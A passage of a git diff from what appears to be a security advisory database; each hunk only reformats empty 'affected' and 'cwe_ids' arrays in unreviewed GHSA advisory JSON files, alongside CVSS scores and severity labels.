[ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-j46j-4c39-75fw/GHSA-j46j-4c39-75fw.json b/advisories/unreviewed/2022/05/GHSA-j46j-4c39-75fw/GHSA-j46j-4c39-75fw.json index a2999bdcec8..11e249b4ea9 100644 --- a/advisories/unreviewed/2022/05/GHSA-j46j-4c39-75fw/GHSA-j46j-4c39-75fw.json +++ b/advisories/unreviewed/2022/05/GHSA-j46j-4c39-75fw/GHSA-j46j-4c39-75fw.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-j4qp-76w7-fjm8/GHSA-j4qp-76w7-fjm8.json b/advisories/unreviewed/2022/05/GHSA-j4qp-76w7-fjm8/GHSA-j4qp-76w7-fjm8.json index 23cb72711f3..7576c14f4ed 100644 --- a/advisories/unreviewed/2022/05/GHSA-j4qp-76w7-fjm8/GHSA-j4qp-76w7-fjm8.json +++ b/advisories/unreviewed/2022/05/GHSA-j4qp-76w7-fjm8/GHSA-j4qp-76w7-fjm8.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -27,9 +25,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-j623-7f45-225m/GHSA-j623-7f45-225m.json b/advisories/unreviewed/2022/05/GHSA-j623-7f45-225m/GHSA-j623-7f45-225m.json index 1869f99905c..1f16f0c5da5 100644 --- a/advisories/unreviewed/2022/05/GHSA-j623-7f45-225m/GHSA-j623-7f45-225m.json +++ b/advisories/unreviewed/2022/05/GHSA-j623-7f45-225m/GHSA-j623-7f45-225m.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-j69q-3vrr-gwj6/GHSA-j69q-3vrr-gwj6.json b/advisories/unreviewed/2022/05/GHSA-j69q-3vrr-gwj6/GHSA-j69q-3vrr-gwj6.json index 65ebb9189dd..b895487aacd 100644 --- a/advisories/unreviewed/2022/05/GHSA-j69q-3vrr-gwj6/GHSA-j69q-3vrr-gwj6.json +++ b/advisories/unreviewed/2022/05/GHSA-j69q-3vrr-gwj6/GHSA-j69q-3vrr-gwj6.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-j79v-5g65-36xq/GHSA-j79v-5g65-36xq.json b/advisories/unreviewed/2022/05/GHSA-j79v-5g65-36xq/GHSA-j79v-5g65-36xq.json index 43eca16f60c..0ea4348c9ce 100644 --- a/advisories/unreviewed/2022/05/GHSA-j79v-5g65-36xq/GHSA-j79v-5g65-36xq.json +++ b/advisories/unreviewed/2022/05/GHSA-j79v-5g65-36xq/GHSA-j79v-5g65-36xq.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-j9f8-5q9w-f7p8/GHSA-j9f8-5q9w-f7p8.json b/advisories/unreviewed/2022/05/GHSA-j9f8-5q9w-f7p8/GHSA-j9f8-5q9w-f7p8.json index ffa751ef1aa..e09432915cd 100644 --- a/advisories/unreviewed/2022/05/GHSA-j9f8-5q9w-f7p8/GHSA-j9f8-5q9w-f7p8.json +++ b/advisories/unreviewed/2022/05/GHSA-j9f8-5q9w-f7p8/GHSA-j9f8-5q9w-f7p8.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -39,9 +37,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-jf47-qj6f-fq8j/GHSA-jf47-qj6f-fq8j.json b/advisories/unreviewed/2022/05/GHSA-jf47-qj6f-fq8j/GHSA-jf47-qj6f-fq8j.json index 432a6b3d6cc..69af17ed40e 100644 --- a/advisories/unreviewed/2022/05/GHSA-jf47-qj6f-fq8j/GHSA-jf47-qj6f-fq8j.json +++ b/advisories/unreviewed/2022/05/GHSA-jf47-qj6f-fq8j/GHSA-jf47-qj6f-fq8j.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -27,9 +25,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-jfhh-fgpm-vwh3/GHSA-jfhh-fgpm-vwh3.json b/advisories/unreviewed/2022/05/GHSA-jfhh-fgpm-vwh3/GHSA-jfhh-fgpm-vwh3.json index 0c4701fb8c7..0cb13de0c48 100644 --- a/advisories/unreviewed/2022/05/GHSA-jfhh-fgpm-vwh3/GHSA-jfhh-fgpm-vwh3.json +++ b/advisories/unreviewed/2022/05/GHSA-jfhh-fgpm-vwh3/GHSA-jfhh-fgpm-vwh3.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-jg5v-cpqp-fcx5/GHSA-jg5v-cpqp-fcx5.json b/advisories/unreviewed/2022/05/GHSA-jg5v-cpqp-fcx5/GHSA-jg5v-cpqp-fcx5.json index 62bc332abac..97368747de6 100644 --- a/advisories/unreviewed/2022/05/GHSA-jg5v-cpqp-fcx5/GHSA-jg5v-cpqp-fcx5.json +++ b/advisories/unreviewed/2022/05/GHSA-jg5v-cpqp-fcx5/GHSA-jg5v-cpqp-fcx5.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-jgx6-9qjv-9pxc/GHSA-jgx6-9qjv-9pxc.json b/advisories/unreviewed/2022/05/GHSA-jgx6-9qjv-9pxc/GHSA-jgx6-9qjv-9pxc.json index a0b705534b9..69efc70a31f 100644 --- a/advisories/unreviewed/2022/05/GHSA-jgx6-9qjv-9pxc/GHSA-jgx6-9qjv-9pxc.json +++ b/advisories/unreviewed/2022/05/GHSA-jgx6-9qjv-9pxc/GHSA-jgx6-9qjv-9pxc.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -27,9 +25,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-jhfw-3fvm-pf8m/GHSA-jhfw-3fvm-pf8m.json b/advisories/unreviewed/2022/05/GHSA-jhfw-3fvm-pf8m/GHSA-jhfw-3fvm-pf8m.json index 2981d4dc602..67a1fa36e09 100644 --- a/advisories/unreviewed/2022/05/GHSA-jhfw-3fvm-pf8m/GHSA-jhfw-3fvm-pf8m.json +++ b/advisories/unreviewed/2022/05/GHSA-jhfw-3fvm-pf8m/GHSA-jhfw-3fvm-pf8m.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -43,9 +41,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-jjx4-r8xm-788q/GHSA-jjx4-r8xm-788q.json b/advisories/unreviewed/2022/05/GHSA-jjx4-r8xm-788q/GHSA-jjx4-r8xm-788q.json index 2ba42dfde55..a22a6932d09 100644 --- a/advisories/unreviewed/2022/05/GHSA-jjx4-r8xm-788q/GHSA-jjx4-r8xm-788q.json +++ b/advisories/unreviewed/2022/05/GHSA-jjx4-r8xm-788q/GHSA-jjx4-r8xm-788q.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -39,9 +37,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-jm75-qhvr-wgfh/GHSA-jm75-qhvr-wgfh.json b/advisories/unreviewed/2022/05/GHSA-jm75-qhvr-wgfh/GHSA-jm75-qhvr-wgfh.json index d67fd149c26..78d95467f6f 100644 --- a/advisories/unreviewed/2022/05/GHSA-jm75-qhvr-wgfh/GHSA-jm75-qhvr-wgfh.json +++ b/advisories/unreviewed/2022/05/GHSA-jm75-qhvr-wgfh/GHSA-jm75-qhvr-wgfh.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-jm77-r886-5j24/GHSA-jm77-r886-5j24.json b/advisories/unreviewed/2022/05/GHSA-jm77-r886-5j24/GHSA-jm77-r886-5j24.json index 2f286a03c10..3807c21f61c 100644 --- a/advisories/unreviewed/2022/05/GHSA-jm77-r886-5j24/GHSA-jm77-r886-5j24.json +++ b/advisories/unreviewed/2022/05/GHSA-jm77-r886-5j24/GHSA-jm77-r886-5j24.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -47,9 +45,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-jp2c-85pm-hhg6/GHSA-jp2c-85pm-hhg6.json b/advisories/unreviewed/2022/05/GHSA-jp2c-85pm-hhg6/GHSA-jp2c-85pm-hhg6.json index b8b8fa90130..e33263fbcdb 100644 --- a/advisories/unreviewed/2022/05/GHSA-jp2c-85pm-hhg6/GHSA-jp2c-85pm-hhg6.json +++ b/advisories/unreviewed/2022/05/GHSA-jp2c-85pm-hhg6/GHSA-jp2c-85pm-hhg6.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-jp4j-77rm-m7cf/GHSA-jp4j-77rm-m7cf.json b/advisories/unreviewed/2022/05/GHSA-jp4j-77rm-m7cf/GHSA-jp4j-77rm-m7cf.json index 258755c7a4b..ce199494b8e 100644 --- a/advisories/unreviewed/2022/05/GHSA-jp4j-77rm-m7cf/GHSA-jp4j-77rm-m7cf.json +++ b/advisories/unreviewed/2022/05/GHSA-jp4j-77rm-m7cf/GHSA-jp4j-77rm-m7cf.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -47,9 +45,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-jq4q-qv4r-4w86/GHSA-jq4q-qv4r-4w86.json b/advisories/unreviewed/2022/05/GHSA-jq4q-qv4r-4w86/GHSA-jq4q-qv4r-4w86.json index a2a48f97309..095777186aa 100644 --- a/advisories/unreviewed/2022/05/GHSA-jq4q-qv4r-4w86/GHSA-jq4q-qv4r-4w86.json +++ b/advisories/unreviewed/2022/05/GHSA-jq4q-qv4r-4w86/GHSA-jq4q-qv4r-4w86.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-jqvf-wwmr-gpq9/GHSA-jqvf-wwmr-gpq9.json b/advisories/unreviewed/2022/05/GHSA-jqvf-wwmr-gpq9/GHSA-jqvf-wwmr-gpq9.json index 1d6cd745280..3b268747061 100644 --- a/advisories/unreviewed/2022/05/GHSA-jqvf-wwmr-gpq9/GHSA-jqvf-wwmr-gpq9.json +++ b/advisories/unreviewed/2022/05/GHSA-jqvf-wwmr-gpq9/GHSA-jqvf-wwmr-gpq9.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-jvg8-88xj-vprr/GHSA-jvg8-88xj-vprr.json b/advisories/unreviewed/2022/05/GHSA-jvg8-88xj-vprr/GHSA-jvg8-88xj-vprr.json index 57d7c48864f..b7cdbd01007 100644 --- a/advisories/unreviewed/2022/05/GHSA-jvg8-88xj-vprr/GHSA-jvg8-88xj-vprr.json +++ b/advisories/unreviewed/2022/05/GHSA-jvg8-88xj-vprr/GHSA-jvg8-88xj-vprr.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-jwc5-fc4v-xgw5/GHSA-jwc5-fc4v-xgw5.json b/advisories/unreviewed/2022/05/GHSA-jwc5-fc4v-xgw5/GHSA-jwc5-fc4v-xgw5.json index 252401d0d08..054ee14fb22 100644 --- a/advisories/unreviewed/2022/05/GHSA-jwc5-fc4v-xgw5/GHSA-jwc5-fc4v-xgw5.json +++ b/advisories/unreviewed/2022/05/GHSA-jwc5-fc4v-xgw5/GHSA-jwc5-fc4v-xgw5.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-jwp4-rhw6-7g6m/GHSA-jwp4-rhw6-7g6m.json b/advisories/unreviewed/2022/05/GHSA-jwp4-rhw6-7g6m/GHSA-jwp4-rhw6-7g6m.json index f7da1357efa..76199d4d75f 100644 --- a/advisories/unreviewed/2022/05/GHSA-jwp4-rhw6-7g6m/GHSA-jwp4-rhw6-7g6m.json +++ b/advisories/unreviewed/2022/05/GHSA-jwp4-rhw6-7g6m/GHSA-jwp4-rhw6-7g6m.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -27,9 +25,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-jwrm-4wqq-pfgh/GHSA-jwrm-4wqq-pfgh.json b/advisories/unreviewed/2022/05/GHSA-jwrm-4wqq-pfgh/GHSA-jwrm-4wqq-pfgh.json index 7c2f876ccb9..da5ec179170 100644 --- a/advisories/unreviewed/2022/05/GHSA-jwrm-4wqq-pfgh/GHSA-jwrm-4wqq-pfgh.json +++ b/advisories/unreviewed/2022/05/GHSA-jwrm-4wqq-pfgh/GHSA-jwrm-4wqq-pfgh.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -43,9 +41,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-jx89-4j89-fggc/GHSA-jx89-4j89-fggc.json b/advisories/unreviewed/2022/05/GHSA-jx89-4j89-fggc/GHSA-jx89-4j89-fggc.json index 0b3912ca5c6..888cb6df3f4 100644 --- a/advisories/unreviewed/2022/05/GHSA-jx89-4j89-fggc/GHSA-jx89-4j89-fggc.json +++ b/advisories/unreviewed/2022/05/GHSA-jx89-4j89-fggc/GHSA-jx89-4j89-fggc.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-jxhq-c35p-v59f/GHSA-jxhq-c35p-v59f.json b/advisories/unreviewed/2022/05/GHSA-jxhq-c35p-v59f/GHSA-jxhq-c35p-v59f.json index 206076e1e35..62f93f209da 100644 --- a/advisories/unreviewed/2022/05/GHSA-jxhq-c35p-v59f/GHSA-jxhq-c35p-v59f.json +++ b/advisories/unreviewed/2022/05/GHSA-jxhq-c35p-v59f/GHSA-jxhq-c35p-v59f.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-m2m4-v4fp-vwc8/GHSA-m2m4-v4fp-vwc8.json b/advisories/unreviewed/2022/05/GHSA-m2m4-v4fp-vwc8/GHSA-m2m4-v4fp-vwc8.json index 21df514c227..b7f1c940233 100644 --- a/advisories/unreviewed/2022/05/GHSA-m2m4-v4fp-vwc8/GHSA-m2m4-v4fp-vwc8.json +++ b/advisories/unreviewed/2022/05/GHSA-m2m4-v4fp-vwc8/GHSA-m2m4-v4fp-vwc8.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -47,9 +45,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-m4cf-888m-jpq9/GHSA-m4cf-888m-jpq9.json b/advisories/unreviewed/2022/05/GHSA-m4cf-888m-jpq9/GHSA-m4cf-888m-jpq9.json index b0fb514e9c3..a799e433a2c 100644 --- a/advisories/unreviewed/2022/05/GHSA-m4cf-888m-jpq9/GHSA-m4cf-888m-jpq9.json +++ b/advisories/unreviewed/2022/05/GHSA-m4cf-888m-jpq9/GHSA-m4cf-888m-jpq9.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-m789-4qgv-8wjh/GHSA-m789-4qgv-8wjh.json b/advisories/unreviewed/2022/05/GHSA-m789-4qgv-8wjh/GHSA-m789-4qgv-8wjh.json index 8380e67309f..5154513ff37 100644 --- a/advisories/unreviewed/2022/05/GHSA-m789-4qgv-8wjh/GHSA-m789-4qgv-8wjh.json +++ b/advisories/unreviewed/2022/05/GHSA-m789-4qgv-8wjh/GHSA-m789-4qgv-8wjh.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -27,9 +25,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-m82x-pp2m-m8m7/GHSA-m82x-pp2m-m8m7.json b/advisories/unreviewed/2022/05/GHSA-m82x-pp2m-m8m7/GHSA-m82x-pp2m-m8m7.json index de21d7a99f6..7d3e14019ba 100644 --- a/advisories/unreviewed/2022/05/GHSA-m82x-pp2m-m8m7/GHSA-m82x-pp2m-m8m7.json +++ b/advisories/unreviewed/2022/05/GHSA-m82x-pp2m-m8m7/GHSA-m82x-pp2m-m8m7.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-m866-pmxh-v798/GHSA-m866-pmxh-v798.json b/advisories/unreviewed/2022/05/GHSA-m866-pmxh-v798/GHSA-m866-pmxh-v798.json index 0dd84321f74..f993f52dcea 100644 --- a/advisories/unreviewed/2022/05/GHSA-m866-pmxh-v798/GHSA-m866-pmxh-v798.json +++ b/advisories/unreviewed/2022/05/GHSA-m866-pmxh-v798/GHSA-m866-pmxh-v798.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-mfxc-mcrv-v23g/GHSA-mfxc-mcrv-v23g.json b/advisories/unreviewed/2022/05/GHSA-mfxc-mcrv-v23g/GHSA-mfxc-mcrv-v23g.json index 3e30b62258d..6d4443eb364 100644 --- a/advisories/unreviewed/2022/05/GHSA-mfxc-mcrv-v23g/GHSA-mfxc-mcrv-v23g.json +++ b/advisories/unreviewed/2022/05/GHSA-mfxc-mcrv-v23g/GHSA-mfxc-mcrv-v23g.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-mh38-x4mv-9qfc/GHSA-mh38-x4mv-9qfc.json b/advisories/unreviewed/2022/05/GHSA-mh38-x4mv-9qfc/GHSA-mh38-x4mv-9qfc.json index 3e6f3503f5a..da96e613027 100644 --- a/advisories/unreviewed/2022/05/GHSA-mh38-x4mv-9qfc/GHSA-mh38-x4mv-9qfc.json +++ b/advisories/unreviewed/2022/05/GHSA-mh38-x4mv-9qfc/GHSA-mh38-x4mv-9qfc.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-mmjr-pq98-q2qm/GHSA-mmjr-pq98-q2qm.json b/advisories/unreviewed/2022/05/GHSA-mmjr-pq98-q2qm/GHSA-mmjr-pq98-q2qm.json index b61aeadd620..ea0ffcebdc1 100644 --- a/advisories/unreviewed/2022/05/GHSA-mmjr-pq98-q2qm/GHSA-mmjr-pq98-q2qm.json +++ b/advisories/unreviewed/2022/05/GHSA-mmjr-pq98-q2qm/GHSA-mmjr-pq98-q2qm.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-mp5g-vcww-pfhw/GHSA-mp5g-vcww-pfhw.json b/advisories/unreviewed/2022/05/GHSA-mp5g-vcww-pfhw/GHSA-mp5g-vcww-pfhw.json index bfb17053f1e..dac52dbb134 100644 --- a/advisories/unreviewed/2022/05/GHSA-mp5g-vcww-pfhw/GHSA-mp5g-vcww-pfhw.json +++ b/advisories/unreviewed/2022/05/GHSA-mp5g-vcww-pfhw/GHSA-mp5g-vcww-pfhw.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-mv23-75j8-f4p8/GHSA-mv23-75j8-f4p8.json b/advisories/unreviewed/2022/05/GHSA-mv23-75j8-f4p8/GHSA-mv23-75j8-f4p8.json index 94d960da30a..1efb38d36a2 100644 --- a/advisories/unreviewed/2022/05/GHSA-mv23-75j8-f4p8/GHSA-mv23-75j8-f4p8.json +++ b/advisories/unreviewed/2022/05/GHSA-mv23-75j8-f4p8/GHSA-mv23-75j8-f4p8.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -39,9 +37,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-mwmv-ph9q-qxvr/GHSA-mwmv-ph9q-qxvr.json b/advisories/unreviewed/2022/05/GHSA-mwmv-ph9q-qxvr/GHSA-mwmv-ph9q-qxvr.json index 3eb983596a0..e6bc0603cf0 100644 --- a/advisories/unreviewed/2022/05/GHSA-mwmv-ph9q-qxvr/GHSA-mwmv-ph9q-qxvr.json +++ b/advisories/unreviewed/2022/05/GHSA-mwmv-ph9q-qxvr/GHSA-mwmv-ph9q-qxvr.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-mwq3-7674-f2c8/GHSA-mwq3-7674-f2c8.json b/advisories/unreviewed/2022/05/GHSA-mwq3-7674-f2c8/GHSA-mwq3-7674-f2c8.json index 78017c72fef..fc8e2754aa9 100644 --- a/advisories/unreviewed/2022/05/GHSA-mwq3-7674-f2c8/GHSA-mwq3-7674-f2c8.json +++ b/advisories/unreviewed/2022/05/GHSA-mwq3-7674-f2c8/GHSA-mwq3-7674-f2c8.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-mxpf-9v3v-24p5/GHSA-mxpf-9v3v-24p5.json b/advisories/unreviewed/2022/05/GHSA-mxpf-9v3v-24p5/GHSA-mxpf-9v3v-24p5.json index ef6b099187e..3c76f828d95 100644 --- a/advisories/unreviewed/2022/05/GHSA-mxpf-9v3v-24p5/GHSA-mxpf-9v3v-24p5.json +++ 